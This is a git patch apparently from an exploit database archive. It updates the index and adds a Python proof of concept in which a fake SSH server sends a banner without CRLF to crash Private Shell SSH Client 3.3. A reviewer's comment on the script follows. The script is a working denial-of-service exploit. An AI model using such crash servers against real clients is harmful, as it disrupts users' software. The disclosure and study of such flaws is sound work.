From 75bd2aed32e251b25788bcf3ab114625f9ea2793 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 1 Jun 2015 05:01:34 +0000
Subject: [PATCH] DB: 2015-06-01 1 new exploits
---
 files.csv | 3 ++-
 platforms/windows/dos/37149.py | 25 +++++++++++++++++++++++++
 2 files changed, 27 insertions(+), 1 deletion(-)
 create mode 100755 platforms/windows/dos/37149.py
diff --git a/files.csv b/files.csv
index b44d1a8a0..1978e9376 100755
--- a/files.csv
+++ b/files.csv
@@ -21241,7 +21241,7 @@ id,file,description,date,author,platform,type,port
 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0
 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0
 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0
-24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0
+24044,platforms/php/webapps/24044.txt,"phpLiteAdmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0
 24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0
 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0
 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection Vulnerability",2004-04-23,JQ,php,webapps,0
@@ -33530,5 +33530,6 @@ id,file,description,date,author,platform,type,port
 37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 'ajaxhelper.php' Cross Site Scripting Vulnerability",2012-05-09,"High-Tech Bridge SA",php,webapps,0
 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0
 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
+37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22
 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
diff --git a/platforms/windows/dos/37149.py b/platforms/windows/dos/37149.py
new file mode 100755
index 000000000..032f855d9
--- /dev/null
+++ b/platforms/windows/dos/37149.py
@@ -0,0 +1,25 @@
+'''
+# Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability
+# Date: 27-5-2015
+# Vendor homepage: www.privateshell.com
+# Software Link: http://www.privateshell.com/files/pshell.exe
+# Version: 3.3
+# Author: 3unnym00n
+
+# Details:
+# --------
+# when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash
+
+# Tested On: win7
+# operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" root@127.0.0.1
+
+'''
+
+
+
+import socket
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+soc.bind(('127.0.0.1', 22))
+soc.listen(1)
+client, addr = soc.accept()
+client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash
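Review bot: The `# Details:` block in 37149.py attributes the crash to a banner missing `\r\n`, but the script ends immediately after `client.send(...)` with no further read or explicit close, so the client presumably sees an unterminated identification string followed by the connection being torn down, and the file cannot tell those two conditions apart. That distinction matters to whoever writes the fix or a regression test; RFC 4253 section 4.2 requires the identification string to end in CR LF, so the header should record the expected behaviour, e.g. `# Expected: client rejects the unterminated banner and disconnects with a protocol error instead of crashing`. The `send` call passes a `str`, so the file runs only under Python 2, and a `# Requires: Python 2` line in the header would make that explicit. The header also gives no fixed version or advisory reference, so affected-version scope beyond 3.3 is not established by this commit and should be marked as unknown rather than left implicit.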